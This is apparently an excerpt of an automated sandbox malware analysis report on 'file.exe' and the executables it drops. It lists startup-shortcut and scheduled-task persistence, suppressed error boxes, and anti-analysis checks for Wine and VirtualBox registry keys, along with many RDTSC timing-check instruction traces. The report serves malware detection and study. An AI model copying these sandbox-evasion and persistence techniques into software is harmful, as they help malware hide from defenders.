                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\github.lnkJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\github.lnkJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57200 second address: E57208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E7D8 second address: E3E7E2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3DE916F962h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56649 second address: E566A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEEh 0x00000007 push esi 0x00000008 jmp 00007F3DE9170BF3h 0x0000000d jno 00007F3DE9170BE6h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d jns 00007F3DE9170BE6h 0x00000023 popad 0x00000024 jp 00007F3DE9170BFFh 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E566A3 second address: E566A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E566A9 second address: E566B3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3DE9170BE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E566B3 second address: E566C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jne 00007F3DE916F956h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E566C3 second address: E566C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56A65 second address: E56A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56B75 second address: E56B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58690 second address: E58694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58694 second address: E5869A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5869A second address: E586BF instructions: 0x00000000 rdtsc 0x00000002 je 00007F3DE916F969h 0x00000008 jmp 00007F3DE916F963h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E586BF second address: E58738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007F3DE9170BE8h 0x0000000b popad 0x0000000c pop eax 0x0000000d mov esi, eax 0x0000000f push 00000003h 0x00000011 mov dword ptr [ebp+122D1C31h], edx 0x00000017 push 00000000h 0x00000019 jmp 00007F3DE9170BF5h 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F3DE9170BE8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a call 00007F3DE9170BE9h 0x0000003f jmp 00007F3DE9170BF7h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58738 second address: E5873E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5873E second address: E58758 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F3DE9170BE6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F3DE9170BE8h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58758 second address: E587C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F965h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F3DE916F961h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jno 00007F3DE916F962h 0x0000001a pop eax 0x0000001b sub edi, dword ptr [ebp+122D3653h] 0x00000021 mov edx, dword ptr [ebp+122D373Fh] 0x00000027 lea ebx, dword ptr [ebp+1244D30Ch] 0x0000002d push edi 0x0000002e mov dword ptr [ebp+122D2AC5h], eax 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F3DE916F95Ch 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E587C7 second address: E587CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58857 second address: E5885C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5885C second address: E58862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A667 second address: E6A671 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3DE916F956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B1DE second address: E3B1FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3DE9170BECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F3DE9170BECh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7753E second address: E77544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E77544 second address: E77548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E77548 second address: E77553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E77C1E second address: E77C4B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F3DE9170BF9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F3DE9170BE6h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78041 second address: E78049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78049 second address: E7804F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7804F second address: E78061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE916F95Dh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78222 second address: E78228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78228 second address: E7822D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7822D second address: E78233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78362 second address: E78366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E784BA second address: E784CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E784CB second address: E784CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E784CF second address: E784E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3DE9170BECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7863E second address: E78658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F960h 0x00000007 jl 00007F3DE916F956h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78658 second address: E78664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jno 00007F3DE9170BE6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78664 second address: E78672 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3DE916F956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78672 second address: E78676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78805 second address: E78810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78810 second address: E78814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78814 second address: E78818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78E1D second address: E78E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78FB6 second address: E78FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F3DE916F965h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78FD5 second address: E78FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3DE9170BE6h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F3DE9170BF4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E79585 second address: E795CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3DE916F95Ch 0x0000000b jns 00007F3DE916F956h 0x00000011 pop edi 0x00000012 push esi 0x00000013 push edx 0x00000014 jmp 00007F3DE916F95Eh 0x00000019 jmp 00007F3DE916F964h 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F3DE916F95Eh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E795CC second address: E795D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8085B second address: E8085F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8085F second address: E80863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80863 second address: E80869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E809AF second address: E809B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E809B5 second address: E809BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F3DE916F956h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80AFB second address: E80B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80B00 second address: E80B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE916F95Ch 0x00000009 rdtsc
